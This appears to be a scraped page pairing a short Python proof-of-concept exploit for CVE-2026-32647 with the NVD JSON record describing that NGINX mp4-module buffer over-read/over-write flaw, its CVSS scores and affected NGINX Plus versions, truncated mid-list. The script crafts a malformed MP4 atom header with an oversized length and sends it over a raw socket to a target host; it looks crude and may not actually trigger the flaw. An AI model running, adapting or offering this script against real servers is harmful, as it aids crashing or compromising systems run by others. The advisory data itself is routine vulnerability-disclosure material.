CVE-2026-32647

import socket import struct def create_malformed_mp4(): # Simulate a malformed MP4 atom with an invalid size # Size: 0xFFFFFFFF (Max uint32, causes overflow) # Type: 'ftyp' malformed_header = struct.pack('>I', 0xFFFFFFFF) + b'ftyp' return malformed_header def send_exploit(target_host, target_port): payload = create_malformed_mp4() request = f"""POST /upload.mp4 HTTP/1.1 Host: {target_host} Content-Type: video/mp4 Content-Length: {len(payload)} """.encode() + payload try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_host, target_port)) s.send(request) print("[+] Malformed MP4 payload sent successfully.") s.close() except Exception as e: print(f"[-] Error sending payload: {e}") # Usage Example # send_exploit("192.168.1.10", 80)

{"cve": {"id": "CVE-2026-32647", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:34.667", "lastModified": "2026-03-26T21:11:50.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NGINX Open Source and NGINX Plus have a vulnerability in the ngx_http_mp4_module module, which might allow an attacker to trigger a buffer over-read or over-write to the NGINX worker memory resulting in its termination or possibly code execution, using a specially crafted MP4 file. This issue affects NGINX Open Source and NGINX Plus if it is built with the ngx_http_mp4_module module and the mp4 directive is used in the configuration file. Additionally, the attack is possible only if an attacker can trigger the processing of a specially crafted MP4 file with the ngx_http_mp4_module module. \n\n\nNote: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}, {"lang": "es", "value": "NGINX Open Source y NGINX Plus tienen una vulnerabilidad en el módulo ngx_http_mp4_module, que podría permitir a un atacante desencadenar una lectura o escritura excesiva de búfer en la memoria del proceso worker de NGINX, lo que resultaría en su terminación o posiblemente en la ejecución de código, utilizando un archivo MP4 especialmente diseñado. Este problema afecta a NGINX Open Source y NGINX Plus si está compilado con el módulo ngx_http_mp4_module y la directiva mp4 se utiliza en el archivo de configuración. Además, el ataque es posible solo si un atacante puede desencadenar el procesamiento de un archivo MP4 especialmente diseñado con el módulo ngx_http_mp4_module.\n\nNota: Las versiones de software que han alcanzado el Fin de Soporte Técnico (EoTS) no son evaluadas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p1:*:*:*:*:*:*", "matchCriteriaId": "FA913184-EAAD-409E-99C6-AB979DAA93F3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p2:*:*:*:*:*:*", "matchCriteriaId": "782DF180-1101-4D6A-A1D7-8DADBAF6D9D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p3:*:*:*:*:*:*", "matchCriteriaId": "FB0B11F2-4748-492B-9906-F8C4C5EAFF12"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p4:*:*:*:*:*:*", "matchCriteriaId": "86B53968-1CCA-4CF3-8454-BB92EF64D10E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:*:*:*:*:*:*:*", "matchCriteriaId": "4F58BD02-EA76-4F32-87D6-430026C8553E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:p1:*:*:*:*:*:*", "matchCriteriaId": "46DC49B8-7286-4867-9CDA-1C1B469CD304"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:p2:*:*:*:*:*:*", "matchCriteriaId": "43477C2E-7485-4146-B25C-F58D632CD85B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:p3 ... (truncated)